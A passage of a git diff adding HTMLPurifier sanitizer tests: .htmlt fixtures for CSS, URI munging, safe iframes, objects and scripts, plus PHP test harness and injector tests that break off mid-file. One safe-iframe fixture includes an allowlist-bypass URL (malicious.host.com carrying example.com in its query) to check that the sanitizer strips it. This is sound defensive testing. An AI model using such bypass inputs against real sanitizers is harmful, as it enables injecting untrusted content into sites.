b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/css-allowed-preserve.htmlt new file mode 100644 index 000000000..a5fe3f849 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/css-allowed-preserve.htmlt @@ -0,0 +1,5 @@ +--INI-- +CSS.AllowedProperties = color,background-color +--HTML-- +<div style="color:#f00;background-color:#ded;">red</div> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/css-allowed-remove.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/css-allowed-remove.htmlt new file mode 100644 index 000000000..644b7001a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/css-allowed-remove.htmlt @@ -0,0 +1,7 @@ +--INI-- +CSS.AllowedProperties = color,background-color +--HTML-- +<div style="color:#f00;border:1px solid #000">red</div> +--EXPECT-- +<div style="color:#f00;">red</div> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/disable-uri.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/disable-uri.htmlt new file mode 100644 index 000000000..fa692e444 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/disable-uri.htmlt @@ -0,0 +1,6 @@ +--INI-- +URI.Disable = true +--HTML-- +<img src="foobar" /> +--EXPECT-- +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/double-youtube.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/double-youtube.htmlt new file mode 100644 index 000000000..a46ce4736 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/double-youtube.htmlt @@ -0,0 +1,6 @@ +--INI-- +HTML.SafeObject = true +Output.FlashCompat = true +--HTML-- +<object width="425" height="350" data="http://www.youtube.com/v/BdU--T8rLns" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="http://www.youtube.com/v/BdU--T8rLns" /><param name="wmode" value="window" /></object> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/empty.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/empty.htmlt new file mode 100644 index 000000000..9094c47b0 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/empty.htmlt @@ -0,0 +1,6 @@ +--INI-- + +--HTML-- + +--EXPECT-- +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/file-uri.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/file-uri.htmlt new file mode 100644 index 000000000..5b9e34a8c --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/file-uri.htmlt @@ -0,0 +1,5 @@ +--INI-- +URI.AllowedSchemes = file +--HTML-- +<a href="file:///foo">foo</a> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/id-default.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/id-default.htmlt new file mode 100644 index 000000000..1c1460f2c --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/id-default.htmlt @@ -0,0 +1,5 @@ +--HTML-- +<span id="moon">foobar</span> +--EXPECT-- +<span>foobar</span> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/id-enabled.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/id-enabled.htmlt new file mode 100644 index 000000000..70ddcf99f --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/id-enabled.htmlt @@ -0,0 +1,6 @@ +--INI-- +Attr.EnableID = true +--HTML-- +<span id="moon">foobar</span> +<img id="folly" src="folly.png" alt="Omigosh!" /> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/id-img.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/id-img.htmlt new file mode 100644 index 000000000..12755bea3 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/id-img.htmlt @@ -0,0 +1,8 @@ +--INI-- +Attr.EnableID = true +Core.LexerImpl = DirectLex +--HTML-- +<img src="img_11775.jpg" alt="[Img #11775]" id="EMBEDDED_IMG_11775" > +--EXPECT-- +<img src="img_11775.jpg" alt="[Img #11775]" id="EMBEDDED_IMG_11775" /> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/id-name-mix.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/id-name-mix.htmlt new file mode 100644 index 000000000..a48da8e62 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/id-name-mix.htmlt @@ -0,0 +1,11 @@ +--INI-- +Attr.EnableID = true +--HTML-- +<a name="foo" id="foo">Test</a> +<a name="foo">Test2</a> +<a name="bar" id="baz">Test3</a> +--EXPECT-- +<a name="foo" id="foo">Test</a> +<a>Test2</a> +<a name="bar" id="baz">Test3</a> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/inline-list-loop.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/inline-list-loop.htmlt new file mode 100644 index 000000000..0a63e8955 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/inline-list-loop.htmlt @@ -0,0 +1,5 @@ +--HTML-- +<i><ul></ul></i> +--EXPECT-- +<i></i><i></i> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/inline-wraps-block.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/inline-wraps-block.htmlt new file mode 100644 index 000000000..da6bae689 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/inline-wraps-block.htmlt @@ -0,0 +1,5 @@ +--HTML-- +<a href="foo.html"><h1>Foobar</h1></a> +--EXPECT-- +<a href="foo.html"></a><h1><a href="foo.html">Foobar</a></h1><a href="foo.html"></a> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/list-nesting.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/list-nesting.htmlt new file mode 100644 index 000000000..22ebf6058 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/list-nesting.htmlt @@ -0,0 +1,5 @@ +--HTML-- +<ul><li>Sublist 1</li><ul><li>Bullet</li></ul></ul> +--EXPECT-- +<ul><li>Sublist 1<ul><li>Bullet</li></ul></li></ul> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/munge-extra.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/munge-extra.htmlt new file mode 100644 index 000000000..4b1c70a9d --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/munge-extra.htmlt @@ -0,0 +1,11 @@ +--INI-- +URI.Munge = "/redirect?s=%s&t=%t&r=%r&n=%n&m=%m&p=%p" +URI.MungeSecretKey = "foo" +URI.MungeResources = true +--HTML-- +<a href="http://example.com">Link</a> +<img src="http://example.com" style="background-image:url(http://example.com);" alt="example.com" /> +--EXPECT-- +<a href="/redirect?s=http%3A%2F%2Fexample.com&t=c15354f3953dfec262c55b1403067e0d045a3059&r=&n=a&m=href&p=">Link</a> +<img src="/redirect?s=http%3A%2F%2Fexample.com&t=c15354f3953dfec262c55b1403067e0d045a3059&r=1&n=img&m=src&p=" style="background-image:url("/redirect?s=http%3A%2F%2Fexample.com&t=c15354f3953dfec262c55b1403067e0d045a3059&r=1&n=img&m=style&p=background-image");" alt="example.com" /> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/munge.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/munge.htmlt new file mode 100644 index 000000000..827c216e6 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/munge.htmlt @@ -0,0 +1,52 @@ +--INI-- +URI.Munge = "/r/%s" +URI.AllowedSchemes = http,ftp,file +--HTML-- +<a href="google.com">foo</a> +<a href="/google.com">foo</a> +<a href="//google.com">foo</a> +<a href="///google.com">foo</a> +<a href="////google.com">foo</a> + +<a href="http:google.com">foo</a> +<a href="http:/google.com">foo</a> +<a href="http://google.com">foo</a> +<a href="http:///google.com">foo</a> +<a href="http:////google.com">foo</a> + +<a href="ftp:google.com">foo</a> +<a href="ftp:/google.com">foo</a> +<a href="ftp://google.com">foo</a> +<a href="ftp:///google.com">foo</a> +<a href="ftp:////google.com">foo</a> + +<a href="file:google.com">foo</a> +<a href="file:/google.com">foo</a> +<a href="file://google.com">foo</a> +<a href="file:///google.com">foo</a> +<a href="file:////google.com">foo</a> +--EXPECT-- +<a href="google.com">foo</a> +<a href="/google.com">foo</a> +<a href="/r/%2F%2Fgoogle.com">foo</a> +<a href="/google.com">foo</a> +<a>foo</a> + +<a href="google.com">foo</a> +<a href="/google.com">foo</a> +<a href="/r/http%3A%2F%2Fgoogle.com">foo</a> +<a href="/google.com">foo</a> +<a>foo</a> + +<a>foo</a> +<a>foo</a> +<a href="/r/ftp%3A%2F%2Fgoogle.com">foo</a> +<a>foo</a> +<a>foo</a> + +<a href="file:google.com">foo</a> +<a href="file:/google.com">foo</a> +<a href="file://google.com">foo</a> +<a href="file:///google.com">foo</a> +<a href="file:////google.com">foo</a> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/name.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/name.htmlt new file mode 100644 index 000000000..1713ed417 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/name.htmlt @@ -0,0 +1,6 @@ +--INI-- +Attr.EnableID = true +HTML.Doctype = "XHTML 1.0 Strict" +--HTML-- +<a name="asdf"></a> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-iframe-googlemaps.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-iframe-googlemaps.htmlt new file mode 100644 index 000000000..40fac62d5 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-iframe-googlemaps.htmlt @@ -0,0 +1,8 @@ +--INI-- +HTML.SafeIframe = true +URI.SafeIframeRegexp = "%^http://maps.google.com/%" +--HTML-- +<iframe width="425" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/?ie=UTF8&ll=37.0625,-95.677068&spn=24.455808,37.353516&z=4&output=embed"></iframe> +--EXPECT-- +<iframe width="425" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/?ie=UTF8&ll=37.0625,-95.677068&spn=24.455808,37.353516&z=4&output=embed"></iframe> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-iframe-invalid.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-iframe-invalid.htmlt new file mode 100644 index 000000000..5b366da54 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-iframe-invalid.htmlt @@ -0,0 +1,7 @@ +--INI-- +HTML.SafeIframe = true +--HTML-- +<iframe src="http://www.example.com/"></iframe> +--EXPECT-- +<iframe></iframe> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-iframe-youtube.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-iframe-youtube.htmlt new file mode 100644 index 000000000..1abc2c827 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-iframe-youtube.htmlt @@ -0,0 +1,8 @@ +--INI-- +HTML.SafeIframe = true +URI.SafeIframeRegexp = "%^http://www.youtube.com/embed/%" +--HTML-- +<iframe title="YouTube video player" width="480" height="390" src="http://www.youtube.com/embed/RVtEQxH7PWA" frameborder="0" allowfullscreen></iframe> +--EXPECT-- +<iframe title="YouTube video player" width="480" height="390" src="http://www.youtube.com/embed/RVtEQxH7PWA" frameborder="0"></iframe> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-iframe.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-iframe.htmlt new file mode 100644 index 000000000..7c0b60d2f --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-iframe.htmlt @@ -0,0 +1,14 @@ +--INI-- +HTML.SafeIframe = true +URI.SafeIframeRegexp = "%(^http://www.example.com/|^https?://dev.example.com/)%" +--HTML-- +<iframe src="http://www.example.com/"></iframe> +<iframe src="http://malicious.host.com/?http://www.example.com/"></iframe> +<iframe src="http://dev.example.com/"></iframe> +<iframe src="https://dev.example.com/"></iframe> +--EXPECT-- +<iframe src="http://www.example.com/"></iframe> +<iframe></iframe> +<iframe src="http://dev.example.com/"></iframe> +<iframe src="https://dev.example.com/"></iframe> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-object-embed-munge.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-object-embed-munge.htmlt new file mode 100644 index 000000000..77b32d3a1 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-object-embed-munge.htmlt @@ -0,0 +1,10 @@ +--INI-- +HTML.SafeObject = true +HTML.SafeEmbed = true +URI.Munge = "/redirect.php?url=%s&check=%t" +URI.MungeSecretKey = "foo" +--HTML-- +<object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en"></param><embed src="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed></object> +--EXPECT-- +<object width="425" height="344" data="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" /><embed src="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash" width="425" height="344" allowscriptaccess="never" allownetworking="internal" /></object> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-object-embed.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-object-embed.htmlt new file mode 100644 index 000000000..f4bb0ff09 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/safe-object-embed.htmlt @@ -0,0 +1,8 @@ +--INI-- +HTML.SafeObject = true +HTML.SafeEmbed = true +--HTML-- +<object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en"></param><embed src="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed></object> +--EXPECT-- +<object width="425" height="344" data="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" /><embed src="http://www.youtube.com/v/Oq3FV_zdyy0&hl=en" type="application/x-shockwave-flash" width="425" height="344" allowscriptaccess="never" allownetworking="internal" /></object> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-bare.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-bare.htmlt new file mode 100644 index 000000000..f85c2fb5e --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-bare.htmlt @@ -0,0 +1,9 @@ +--INI-- +HTML.Trusted = true +--HTML-- +<script type="text/javascript">alert("<This is compatible with XHTML>");</script> +--EXPECT-- +<script type="text/javascript"><!--//--><![CDATA[//><!-- +alert("<This is compatible with XHTML>"); +//--><!]]></script> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-cdata.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-cdata.htmlt new file mode 100644 index 000000000..e7d6d7f5b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-cdata.htmlt @@ -0,0 +1,11 @@ +--INI-- +HTML.Trusted = true +--HTML-- +<script type="text/javascript"><![CDATA[ +alert("<This is compatible with XHTML>"); +]]></script> +--EXPECT-- +<script type="text/javascript"><!--//--><![CDATA[//><!-- +alert("<This is compatible with XHTML>"); +//--><!]]></script> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-comment.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-comment.htmlt new file mode 100644 index 000000000..006901919 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-comment.htmlt @@ -0,0 +1,11 @@ +--INI-- +HTML.Trusted = true +--HTML-- +<script type="text/javascript"><!-- +alert("<This is compatible with XHTML>"); +//--></script> +--EXPECT-- +<script type="text/javascript"><!--//--><![CDATA[//><!-- +alert("<This is compatible with XHTML>"); +//--><!]]></script> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-dbl-comment.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-dbl-comment.htmlt new file mode 100644 index 000000000..ef899b597 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-dbl-comment.htmlt @@ -0,0 +1,11 @@ +--INI-- +HTML.Trusted = true +--HTML-- +<script type="text/javascript"><![CDATA[ +alert("<This is compatible with XHTML>"); +//]]></script> +--EXPECT-- +<script type="text/javascript"><!--//--><![CDATA[//><!-- +alert("<This is compatible with XHTML>"); +//--><!]]></script> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-ideal.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-ideal.htmlt new file mode 100644 index 000000000..70510687c --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/script-ideal.htmlt @@ -0,0 +1,11 @@ +--INI-- +HTML.Trusted = true +--HTML-- +<script type="text/javascript"><!--//--><![CDATA[//><!-- +alert("<This is compatible with XHTML>"); +//--><!]]></script> +--EXPECT-- +<script type="text/javascript"><!--//--><![CDATA[//><!-- +alert("<This is compatible with XHTML>"); +//--><!]]></script> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/secure-munge.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/secure-munge.htmlt new file mode 100644 index 000000000..114cb0000 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/secure-munge.htmlt @@ -0,0 +1,10 @@ +--INI-- +URI.Munge = "/redirect.php?url=%s&check=%t" +URI.MungeSecretKey = "foo" +--HTML-- +<a href="http://localhost">foo</a> +<img src="http://localhost" alt="local" /> +--EXPECT-- +<a href="/redirect.php?url=http%3A%2F%2Flocalhost&check=8e8223ae8fac24561104180ea549c21fbd111be7">foo</a> +<img src="http://localhost" alt="local" /> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/shift-jis-preserve-yen.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/shift-jis-preserve-yen.htmlt new file mode 100644 index 000000000..f22417c01 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/shift-jis-preserve-yen.htmlt @@ -0,0 +1,8 @@ +--SKIPIF-- +if (!function_exists('iconv')) return true; +--INI-- +Core.Encoding = "Shift_JIS" +Core.EscapeNonASCIICharacters = true +--HTML-- +<b style="font-family:'¥';">111</b> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/shift-jis-remove-yen.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/shift-jis-remove-yen.htmlt new file mode 100644 index 000000000..6c2d3bc4c --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/shift-jis-remove-yen.htmlt @@ -0,0 +1,9 @@ +--SKIPIF-- +if (!function_exists('iconv')) return true; +--INI-- +Core.Encoding = Shift_JIS +--HTML-- +<b style="font-family:'¥';">111</b> +--EXPECT-- +<b style="font-family:'';">111</b> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/strict-blockquote-with-inline.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/strict-blockquote-with-inline.htmlt new file mode 100644 index 000000000..a6eb0ec66 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/strict-blockquote-with-inline.htmlt @@ -0,0 +1,7 @@ +--INI-- +HTML.Doctype = "XHTML 1.0 Strict" +--HTML-- +<blockquote>Illegal <b>contents</b></blockquote> +--EXPECT-- +<blockquote><p>Illegal <b>contents</b></p></blockquote> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/strict-blockquote.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/strict-blockquote.htmlt new file mode 100644 index 000000000..b61e8dc07 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/strict-blockquote.htmlt @@ -0,0 +1,7 @@ +--INI-- +HTML.Strict = true +--HTML-- +<blockquote>Illegal contents</blockquote> +--EXPECT-- +<blockquote><p>Illegal contents</p></blockquote> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/strict-underline.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/strict-underline.htmlt new file mode 100644 index 000000000..a2e18b1c9 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/strict-underline.htmlt @@ -0,0 +1,7 @@ +--INI-- +HTML.Strict = true +--HTML-- +<u>Illegal underline</u> +--EXPECT-- +<span style="text-decoration:underline;">Illegal underline</span> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/tidy-background.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/tidy-background.htmlt new file mode 100644 index 000000000..08bda2678 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/tidy-background.htmlt @@ -0,0 +1,5 @@ +--HTML-- +<table background="logo.png"><tr><td>asdf</td></tr></table> +--EXPECT-- +<table style="background-image:url("logo.png");"><tr><td>asdf</td></tr></table> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/trusted-comments-required.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/trusted-comments-required.htmlt new file mode 100644 index 000000000..62dc159d0 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/trusted-comments-required.htmlt @@ -0,0 +1,6 @@ +--INI-- +HTML.Trusted = true +--HTML-- +<ul><!-- Foo --></ul> +--EXPECT-- +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/trusted-comments-table.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/trusted-comments-table.htmlt new file mode 100644 index 000000000..89d80febf --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/trusted-comments-table.htmlt @@ -0,0 +1,5 @@ +--INI-- +HTML.Trusted = true +--HTML-- +<table><!-- foo --><tr><td>Foo</td></tr></table> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/trusted-comments.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/trusted-comments.htmlt new file mode 100644 index 000000000..93b4a35a6 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/trusted-comments.htmlt @@ -0,0 +1,5 @@ +--INI-- +HTML.Trusted = true +--HTML-- +<!-- Foobar --> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/whitespace-preserve.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/whitespace-preserve.htmlt new file mode 100644 index 000000000..861bddaf4 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/whitespace-preserve.htmlt @@ -0,0 +1,3 @@ +--HTML-- +Foo<b> </b>bar +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Harness.php b/lib/htmlpurifier/tests/HTMLPurifier/Harness.php new file mode 100644 index 000000000..d6490a117 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Harness.php @@ -0,0 +1,90 @@ +<?php + +/** + * All-use harness, use this rather than SimpleTest's + */ +class HTMLPurifier_Harness extends UnitTestCase +{ + + public function __construct($name = null) { + parent::__construct($name); + } + + protected $config, $context, $purifier; + + /** + * Generates easily accessible default config/context, as well as + * a convenience purifier for integration testing. + */ + public function setUp() { + list($this->config, $this->context) = $this->createCommon(); + $this->config->set('Output.Newline', ' +'); + $this->purifier = new HTMLPurifier(); + } + + /** + * Asserts a purification. Good for integration testing. + */ + function assertPurification($input, $expect = null) { + if ($expect === null) $expect = $input; + $result = $this->purifier->purify($input, $this->config); + $this->assertIdentical($expect, $result); + } + + + /** + * Accepts config and context and prepares them into a valid state + * @param &$config Reference to config variable + * @param &$context Reference to context variable + */ + protected function prepareCommon(&$config, &$context) { + $config = HTMLPurifier_Config::create($config); + if (!$context) $context = new HTMLPurifier_Context(); + } + + /** + * Generates default configuration and context objects + * @return Defaults in form of array($config, $context) + */ + protected function createCommon() { + return array(HTMLPurifier_Config::createDefault(), new HTMLPurifier_Context); + } + + /** + * Normalizes a string to Unix (\n) endings + */ + protected function normalize(&$string) { + $string = str_replace(array("\r\n", "\r"), "\n", $string); + } + + /** + * If $expect is false, ignore $result and check if status failed. + * Otherwise, check if $status if true and $result === $expect. + * @param $status Boolean status + * @param $result Mixed result from processing + * @param $expect Mixed expectation for result + */ + protected function assertEitherFailOrIdentical($status, $result, $expect) { + if ($expect === false) { + $this->assertFalse($status, 'Expected false result, got true'); + } else { + $this->assertTrue($status, 'Expected true result, got false'); + $this->assertIdentical($result, $expect); + } + } + + public function getTests() { + // __onlytest makes only one test get triggered + foreach (get_class_methods(get_class($this)) as $method) { + if (strtolower(substr($method, 0, 10)) == '__onlytest') { + $this->reporter->paintSkip('All test methods besides ' . $method); + return array($method); + } + } + return parent::getTests(); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/IDAccumulatorTest.php b/lib/htmlpurifier/tests/HTMLPurifier/IDAccumulatorTest.php new file mode 100644 index 000000000..90bca0739 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/IDAccumulatorTest.php @@ -0,0 +1,39 @@ +<?php + +class HTMLPurifier_IDAccumulatorTest extends HTMLPurifier_Harness +{ + + function test() { + + // initialize the accumulator + $accumulator = new HTMLPurifier_IDAccumulator(); + + $this->assertTrue( $accumulator->add('id1')); + $this->assertTrue( $accumulator->add('id2')); + $this->assertFalse($accumulator->add('id1')); // repeated id + + // you can also access the properties (they're public) + $this->assertTrue( isset($accumulator->ids['id2']) ); + + } + + function testLoad() { + + $accumulator = new HTMLPurifier_IDAccumulator(); + + $accumulator->load(array('id1', 'id2', 'id3')); + + $this->assertFalse($accumulator->add('id1')); // repeated id + $this->assertTrue($accumulator->add('id4')); + + } + + function testBuild() { + $this->config->set('Attr.IDBlacklist', array('foo')); + $accumulator = HTMLPurifier_IDAccumulator::build($this->config, $this->context); + $this->assertTrue( isset($accumulator->ids['foo']) ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Injector/AutoParagraphTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Injector/AutoParagraphTest.php new file mode 100644 index 000000000..e6abbd1ff --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Injector/AutoParagraphTest.php @@ -0,0 +1,515 @@ +<?php + +class HTMLPurifier_Injector_AutoParagraphTest extends HTMLPurifier_InjectorHarness +{ + + function setup() { + parent::setup(); + $this->config->set('AutoFormat.AutoParagraph', true); + } + + function testSingleParagraph() { + $this->assertResult( + 'Foobar', + '<p>Foobar</p>' + ); + } + + function testSingleMultiLineParagraph() { + $this->assertResult( +'Par 1 +Par 1 still', +'<p>Par 1 +Par 1 still</p>' + ); + } + + function testTwoParagraphs() { + $this->assertResult( +'Par1 + +Par2', +"<p>Par1</p> + +<p>Par2</p>" + ); + } + + function testTwoParagraphsWithLotsOfSpace() { + $this->assertResult( +'Par1 + + + +Par2', +'<p>Par1</p> + +<p>Par2</p>' + ); + } + + function testTwoParagraphsWithInlineElements() { + $this->assertResult( +'<b>Par1</b> + +<i>Par2</i>', +'<p><b>Par1</b></p> + +<p><i>Par2</i></p>' + ); + } + + function testSingleParagraphThatLooksLikeTwo() { + $this->assertResult( +'<b>Par1 + +Par2</b>', +'<p><b>Par1 + +Par2</b></p>' + ); + } + + function testAddParagraphAdjacentToParagraph() { + $this->assertResult( + 'Par1<p>Par2</p>', +'<p>Par1</p> + 